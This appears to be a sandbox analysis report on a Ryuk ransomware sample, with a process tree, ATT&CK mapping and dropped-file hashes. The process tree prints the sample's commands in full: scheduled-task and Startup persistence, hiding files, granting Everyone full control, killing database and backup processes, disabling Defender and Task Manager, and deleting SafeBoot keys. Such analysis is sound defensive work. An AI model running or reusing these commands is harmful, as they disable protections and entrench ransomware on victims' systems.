PID 860 wrote to memory of 700	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	40
PID 860 wrote to memory of 700	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	40
PID 700 wrote to memory of 1784	700	cmd.exe	41
PID 700 wrote to memory of 1784	700	cmd.exe	41
PID 700 wrote to memory of 1784	700	cmd.exe	41
PID 860 wrote to memory of 1376	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	42
PID 860 wrote to memory of 1376	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	42
PID 860 wrote to memory of 1376	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	42
PID 1376 wrote to memory of 460	1376	cmd.exe	43
PID 1376 wrote to memory of 460	1376	cmd.exe	43
PID 1376 wrote to memory of 460	1376	cmd.exe	43
PID 860 wrote to memory of 288	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	44
PID 860 wrote to memory of 288	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	44
PID 860 wrote to memory of 288	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	44
PID 288 wrote to memory of 1012	288	cmd.exe	45
PID 288 wrote to memory of 1012	288	cmd.exe	45
PID 288 wrote to memory of 1012	288	cmd.exe	45
PID 860 wrote to memory of 540	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	46
PID 860 wrote to memory of 540	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	46
PID 860 wrote to memory of 540	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	46
PID 860 wrote to memory of 1432	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	48
PID 860 wrote to memory of 1432	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	48
PID 860 wrote to memory of 1432	860	775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe	48
PID 540 wrote to memory of 304	540	cmd.exe	49
PID 540 wrote to memory of 304	540	cmd.exe	49
PID 540 wrote to memory of 304	540	cmd.exe	49
PID 1432 wrote to memory of 1192	1432	cmd.exe	50

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
596	attrib.exe
1784	attrib.exe
460	attrib.exe

C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe
"C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe"
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:840
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:2044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Drops startup file
  PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  PID:268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1528
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F
    3⤵
    - Creates scheduled task(s)
    PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:332
- - C:\Windows\system32\attrib.exe
    attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"
    3⤵
    - Drops startup file
    - Views/modifies file attributes
    PID:596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:612
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:528
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:700
- - C:\Windows\system32\attrib.exe
    attrib +h +s ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1376
- - C:\Windows\system32\attrib.exe
    attrib +h +s C:\ProgramData\ryuk.exe
    3⤵
    - Views/modifies file attributes
    PID:460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:288
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    PID:1012
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:540
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:304
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Windows\system32\cmd.exe
    cmd.exe /c taskkill /t /f /im sql*
    3⤵
    PID:1192
  - - C:\Windows\system32\taskkill.exe
      taskkill /t /f /im sql*
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1912
- - C:\Windows\system32\taskkill.exe
    taskkill /f /t /im veeam*
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2
  2⤵
  PID:2024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID
  2⤵
  PID:1568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1
  2⤵
  PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "
  2⤵
  PID:1420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  PID:1892
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1036
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:580
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1040
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1728
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  PID:1384
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1528

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\RYUKID

Filesize
8B

MD5
f7c9aa8109768d75ea7402cb915b51be

SHA1
cc649a88c2266ae98c2c378a138329e9dcf1832a

SHA256
a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa

SHA512
bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

Download Submit
C:\ProgramData\RyukReadMe.txt

Filesize
1KB

MD5
e5776afce2e7d6fa4feb7a0c4bc2e004

SHA1
8b3cd15a7e34d4b1c0800dad92a07c60647f44dd

SHA256
4ce8d384cf4f82223dde53c4fe9e9e4a249140068ecc9146b6d68c14278a3be7

SHA512
d03dafeae3ccced40bc20dcbc5cfffc13ec01b163d0d7ff5291c088f3e56971645837a0f3405c32fc6467a2d39d2396645b3eac0b2076d88a3110c42b53cd7c6

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
bf3dc7e7792a2b38f146440ad4f79a22

SHA1
a323a963c8efbd3480399611c34bd38a0c8f6721

SHA256
f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

SHA512
04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

Download Submit
C:\ProgramData\hrmlog1

Filesize
2KB

MD5
bf3dc7e7792a2b38f146440ad4f79a22

SHA1
a323a963c8efbd3480399611c34bd38a0c8f6721

SHA256
f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

SHA512
04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
9dbd99471b38780584934dce1c838dc8

SHA1
8826b382ab74a575991fc5a5747bea695913199b

SHA256
02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

SHA512
01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

Download Submit
C:\ProgramData\hrmlog2

Filesize
292B

MD5
9dbd99471b38780584934dce1c838dc8

SHA1
8826b382ab74a575991fc5a5747bea695913199b

SHA256
02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

SHA512
01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

Download Submit
C:\ProgramData\ryuk.exe

Filesize
885KB

MD5
a650d5676dc2c91a3af2216044ddaf8c

SHA1
851eea629fda6f930ebfd7ac45de5e8bc3f506b5

SHA256
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

SHA512
463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RYUKID

Filesize
8B

MD5
f7c9aa8109768d75ea7402cb915b51be

SHA1
cc649a88c2266ae98c2c378a138329e9dcf1832a

SHA256
a2ed9868223619ce158c30a1701f34935ff847d72a72b970be812bc91b5440fa

SHA512
bc70b35f2a6feecb023aad2541cd2f5a838deff88d09fbd5217f27766c845c44c2fdfa01d441a8fb130201771ddd273bf73c982388970783133e7960a7e8c4c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog1

Filesize
2KB

MD5
bf3dc7e7792a2b38f146440ad4f79a22

SHA1
a323a963c8efbd3480399611c34bd38a0c8f6721

SHA256
f4d7c30ba27ee50ca45ee00ab69fc3462c996f3a7834065fa87b79843c8a7b41

SHA512
04cc52de3b394400dbafcdc781f9c0be32dc351ef45c9bc8efaaa76a74eadbbdf4b218b79ade19a53aa636a7c6031b4260177665e835beea3c52eaed726dd805

Download Submit
C:\Users\Admin\AppData\Local\Temp\hrmlog2

Filesize
292B

MD5
9dbd99471b38780584934dce1c838dc8

SHA1
8826b382ab74a575991fc5a5747bea695913199b

SHA256
02c6fdbb283fb9236e42ab6a98a64dbaf487fa5d888727d88a90f7ff6dcd378a

SHA512
01f54374959431e106c57d6389e361cb58ea60b9b99ab52f7bf3746dd63115e74a46f7bb741f8494d0b7b9be944f9ac358690f248d4a036cde7c0c48e388e46b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

Filesize
885KB

MD5
a650d5676dc2c91a3af2216044ddaf8c

SHA1
851eea629fda6f930ebfd7ac45de5e8bc3f506b5

SHA256
775745a0c067961761fa0fba5a2bef456413cd9096906d8772d4b9da6bf5e8b6

SHA512
463c54b4fc50ccfe889ab797339afa3f9096c53f8e551a616829b655f218238f53fc9aa9e6908675fed6be8883a555831af4ae1cc348eb80e937f27b34c760c7

Download Submit
memory/860-103-0x000007FEFB741000-0x000007FEFB743000-memory.dmp

Filesize
8KB

Download